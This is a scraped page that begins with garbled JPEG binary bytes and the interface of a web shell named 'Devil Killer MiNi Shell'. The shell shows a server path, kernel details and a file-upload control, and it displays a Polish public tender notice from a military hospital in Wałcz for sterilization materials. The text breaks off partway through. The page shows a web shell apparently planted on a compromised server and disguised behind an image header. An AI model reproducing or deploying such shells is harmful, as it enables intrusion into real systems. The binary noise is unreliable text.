JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211123/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211123/0028002802-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa materiałów do sterylizacji </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">107 SZPITAL WOJSKOWY Z PRZYCHODNIĄ SAMODZIELNY PUBLICZNY ZAKŁAD OPIEKI ZDROWOTNEJ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 570544566</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">KOŁOBRZESKA 44</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wałcz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">78-600</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL427 - Szczecinecko-pyrzycki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">261 47 28 20</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">261 47 28 20</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowieniapubliczne@107sw.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.107sw.mil.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa materiałów do sterylizacji </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f3fbe4ec-4c32-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00280028</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00004906/10/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.17 Dostawa materiałów do sterylizacji</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-f3fbe4ec-4c32-11ec-8c2d-66c2f1230e9c <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w postępowaniu o<br/>udzielenie zamówienia odbywa się przy użyciu środków komunikacji elektronicznej, za pośrednictwem<br/>platformy zakupowej pod adresem: platformazakupowa.pl/pn/107sw zwanej dalej Platformą.<br/>Zamawiający informuje, że instrukcje korzystania z Platformy dotyczące w szczególności logowania,<br/>składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych<br/>w niniejszym postępowaniu przy użyciu Platformy znajdują się w zakładce „Instrukcje dla<br/>Wykonawców” na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje.<br/>Uwaga! Przed przystąpieniem do składania oferty, Wykonawca jest zobowiązany zapoznać się z<br/>Instrukcją korzystania z Platformy. Ze względu na ograniczoną ilość znaków szczegółowe informacje<br/>dotyczące przyjętego w postępowaniu sposobu komunikacji, znajdują się w rozdziale III podrozdziale 1<br/>niniejszej SWZ.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 31 grudnia 2020 r.<br/>w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu<br/>o udzielenie zamówienia publicznego lub konkursie (Dz. U. 2020 r. poz. 2452), określa niezbędne<br/>wymagania sprzętowo – aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj: stały dostęp do<br/>sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s; komputer klasy PC lub MAC<br/>o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych – MS Windows 7, Mac Os x 10 4 , Linux, lub ich nowsze<br/>wersje;zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalna<br/>wersja 10 0.; włączona obsługa JavaScript;zainstalowany program Adobe Acrobat Reader lub inny<br/>obsługujący format plików .pdf;szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu<br/>TLS 1.3; oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas<br/>(hh:mm:ss) generowany wg czasu lokalnego serwera synchronizowanego z zegarem Głównego<br/>Urzędu Miar.Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia:akceptuje warunki korzystania z Platformy określone w Regulaminie zamieszczonym na<br/>stronie internetowej pod linkiem w zakładce „Regulamin” oraz uznaje go za wiążący; zapoznał i stosuje<br/>się do Instrukcji składania ofert/wniosków dostępnej pod linkiem. Zamawiający nie ponosi<br/>odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją korzystania z Platformy, w<br/>szczególności za sytuację, gdy zamawiający zapozna się z treścią oferty przed upływem terminu<br/>składania ofert (np. złożenie oferty<br/>w zakładce „Wyślij wiadomość do zamawiającego”). Zamawiający informuje, że instrukcje z<br/>korzystania z Platformy, dotyczące w szczególności logowania, składania wniosków o wyjaśnienie<br/>treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy<br/>użyciu Platformy znajdują się w zakładce „Instrukcje dla Wykonawców” na stronie internetowej pod<br/>adresem: https://platformazakupowa.pl/strona/45-instrukcje. Zalecenia: Formaty plików<br/>wykorzystywanych przez wykonawców powinny być zgodne z „OBWIESZCZENIEM PREZESA RADY<br/>MINISTRÓW z dnia 9 listopada 2017 r. w sprawie ogłoszenia jednolitego tekstu rozporządzenia Rady<br/>Ministrów w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów<br/>publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów<br/>teleinformatycznych”: zamawiający rekomenduje wykorzystanie formatów: .pdf, .doc, .xls, .jpg, (.jpeg)<br/>ze szczególnym wskazaniem na .pdf; w celu ewentualnej kompresji danych zamawiający rekomenduje<br/>wykorzystanie jednego z formatów: .zip, .7z; wśród formatów powszechnych a NIE występujących w<br/>rozporządzeniu występują: .gif, .bmp, .numbers, .pages. komunikacja z wykonawcami odbywa się tylko<br/>na Platformie za pośrednictwem formularza „Wyślij wiadomość do zamawiającego”, nie za<br/>pośrednictwem adresu email;korespondencja przekazana zamawiającemu w inny sposób niż za<br/>pomocą Platformy na przykład listownie, mailem nie będzie brana pod uwagę; Sugerujemy złożenie<br/>oferty na 24 godziny przed terminem składania ofert/wniosków;podczas podpisywania plików zaleca<br/>się stosowanie algorytmu skrótu SHA2 zamiast SHA1;zamawiający rekomenduje wykorzystanie<br/>podpisu z kwalifikowanym znacznikiem czasu;zamawiający zaleca aby nie wprowadzić jakichkolwiek<br/>zmian w plikach po podpisaniu ich podpisem kwalifikowanym.Maksymalny rozmiar jednego pliku<br/>przesyłanego za pośrednictwem dedykowanych formularzy do: złożenia, wycofania oferty wynosi 150<br/>MB natomiast przy komunikacji wielkość pliku to maksymalnie 500 MB. Ze względu na ograniczoną<br/>ilość znaków szczegółowe informacje dotyczące wymagań technicznych i organizacyjnych znajdują się<br/>w rozdziale III podrozdziale 1 niniejszej SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1)Zgodnie z art. 13 ust. 1-3 RODO Rozporządzenia<br/>parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób<br/>fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich<br/>danych oraz uchylenia dyrektywy 95/46/W (Dz. Urz. UE L 119 z 04.05.2016, str. 1) zwanego dalej<br/>„RODO”, informuję że, Administratorem Pani/Pana danych osobowych ujawnionych w przedmiotowym<br/>postępowaniu jest 107 Szpital Wojskowy z Przychodnią SP ZOZ, przy ul. Kołobrzeskiej 44, 78-600<br/>Wałcz.<br/>2) Inspektor Ochrony Danych Osobowych dostępny jest pod adresem email: iod@107sw.mil.pl.<br/>3) Podane dane w zakresie wynikającym z właściwych przepisów ustawy Pzp oraz wydanych na jej<br/>podstawie aktów wykonawczych, przetwarzane będą na podstawie art. 6 ust. 1 lit c RODO w celu<br/>przeprowadzenia przedmiotowego postępowania o udzielenie zamówienia publicznego. W pozostałym<br/>zakresie na podstawie Pani/Pana zgody (art. 6 ust. 1 lit. a RODO), wynikającej z faktu złożenia<br/>przedmiotowej oferty.<br/>4) Administrator przekazuje dane osobowe odbiorcom w ramach świadczenia usług na<br/>administrowanie i serwisowanie systemami informatycznymi, obsługę poczty oraz innym<br/>zainteresowanym na zasadach, w szczególności wynikających z art. 18, art. 74, art. 76, art. 222, art.<br/>253, art. 260 wymienionej ustawy Pzp.<br/>5) Dane przechowywane będą przez okres 4 lat od dnia zakończenia postępowania o udzielenie<br/>zamówienia.<br/>6) Przysługuje Pani/Panu prawo: dostępu do swoich danych, w tym otrzymania kopii, ich sprostowania,<br/>ograniczenia przetwarzania oraz wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych<br/>oraz do cofnięcia zgody na ich przetwarzanie w dowolnym momencie. Dane nie będą podlegać<br/>zautomatyzowanemu podejmowaniu decyzji, w tym profilowaniu. Podanie danych, w zakresie<br/>wynikającym z wymienionych przepisów prawa, jest niezbędne do realizacji celu. W pozostałym<br/>zakresie podanie danych jest dobrowolne.<br/>7) Ponadto informuję, że:<br/>a) w przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 RODO (prawo dostępu<br/>do swoich danych i otrzymania ich kopii), wymagałoby niewspółmiernie dużego wysiłku, zamawiający<br/>może żądać od osoby, której dane dotyczą wskazania dodatkowych informacji mających na celu<br/>sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie<br/>zamówienia publicznego lub konkursu;<br/>b) skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia<br/>danych osobowych, o których mowa w art. 16 RODO nie może skutkować zmiana wyniku<br/>postępowania o udzielenie zamówienia publicznego lub konkursu ani zmianą postanowień umowy w<br/>zakresie niezgodnych z ustawą;<br/>c) w postępowaniu o udzielenie zamówienia zgłoszenia żądania ograniczenia przetwarzania, o których<br/>mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia<br/>tego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DZP. 2612.25.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">5</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa materiałów do sterylizacji.<br/>Zamawiający dokonuje podziału zamówienia na części (pakiety): w ilości 5.<br/>Opis poszczególnych części (pakietów) znajduje się w Rozdziale II podrozdział 1 SWZ oraz w<br/>załączniku nr 5 do SWZ stanowiącym szczegółowy opis przedmiotu zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33140000-3 - Materiały medyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">33198000-4 - Szpitalne wyroby papierowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> W stosunku do każdego zadania zamawiający jest uprawniony zlecić wykonawcy dodatkowy zakres rzeczowy („Opcja”). <br/>Przedmiotem Opcji będą dostawy asortymentów tożsamych z opisanymi w SWZ i wycenionych przez wykonawcę w formularzu asortymentowo – cenowym, stanowiącym część oferty, w ilościach określonych w załączniku nr 1.1 – 1.5 do SWZ. <br/>W ramach Opcji, wedle wyboru zamawiającego, może zostać zlecona dostawa wszystkich, niektórych lub jednego asortymentu wskazanego i wycenionego przez wykonawcę w tabeli formularza asortymentowo – cenowego stanowiącego część oferty. <br/>Zamawiający nie jest zobowiązany do zlecenia dostaw objętych przedmiotem Opcji, a wykonawcy nie służy roszczenie o ich zlecenie. Dostawy będące przedmiotem Opcji mogą zostać zlecone w ilości stanowiącej równowartość do 50% wartości przedmiotu zamówienia.<br/>Podstawą określenia wartości dostaw zleconych w ramach Opcji (w celu określenia jej zakresu) będą ceny jednostkowe poszczególnych asortymentów zawarte w formularzu asortymentowo - cenowym, stanowiącym część oferty wykonawcy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa materiałów do sterylizacji.<br/>Zamawiający dokonuje podziału zamówienia na części (pakiety): w ilości 5.<br/>Opis poszczególnych części (pakietów) znajduje się w Rozdziale II podrozdział 1 SWZ oraz w<br/>załączniku nr 5 do SWZ stanowiącym szczegółowy opis przedmiotu zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33140000-3 - Materiały medyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">33198000-4 - Szpitalne wyroby papierowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa materiałów do sterylizacji.<br/>Zamawiający dokonuje podziału zamówienia na części (pakiety): w ilości 5.<br/>Opis poszczególnych części (pakietów) znajduje się w Rozdziale II podrozdział 1 SWZ oraz w<br/>załączniku nr 5 do SWZ stanowiącym szczegółowy opis przedmiotu zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33140000-3 - Materiały medyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">33198000-4 - Szpitalne wyroby papierowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> W stosunku do każdego zadania zamawiający jest uprawniony zlecić wykonawcy dodatkowy zakres rzeczowy („Opcja”). <br/>Przedmiotem Opcji będą dostawy asortymentów tożsamych z opisanymi w SWZ i wycenionych przez wykonawcę w formularzu asortymentowo – cenowym, stanowiącym część oferty, w ilościach określonych w załączniku nr 1.1 – 1.5 do SWZ. <br/>W ramach Opcji, wedle wyboru zamawiającego, może zostać zlecona dostawa wszystkich, niektórych lub jednego asortymentu wskazanego i wycenionego przez wykonawcę w tabeli formularza asortymentowo – cenowego stanowiącego część oferty. <br/>Zamawiający nie jest zobowiązany do zlecenia dostaw objętych przedmiotem Opcji, a wykonawcy nie służy roszczenie o ich zlecenie. Dostawy będące przedmiotem Opcji mogą zostać zlecone w ilości stanowiącej równowartość do 50% wartości przedmiotu zamówienia.<br/>Podstawą określenia wartości dostaw zleconych w ramach Opcji (w celu określenia jej zakresu) będą ceny jednostkowe poszczególnych asortymentów zawarte w formularzu asortymentowo - cenowym, stanowiącym część oferty wykonawcy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa materiałów do sterylizacji.<br/>Zamawiający dokonuje podziału zamówienia na części (pakiety): w ilości 5.<br/>Opis poszczególnych części (pakietów) znajduje się w Rozdziale II podrozdział 1 SWZ oraz w<br/>załączniku nr 5 do SWZ stanowiącym szczegółowy opis przedmiotu zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33140000-3 - Materiały medyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">33198000-4 - Szpitalne wyroby papierowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> W stosunku do każdego zadania zamawiający jest uprawniony zlecić wykonawcy dodatkowy zakres rzeczowy („Opcja”). <br/>Przedmiotem Opcji będą dostawy asortymentów tożsamych z opisanymi w SWZ i wycenionych przez wykonawcę w formularzu asortymentowo – cenowym, stanowiącym część oferty, w ilościach określonych w załączniku nr 1.1 – 1.5 do SWZ. <br/>W ramach 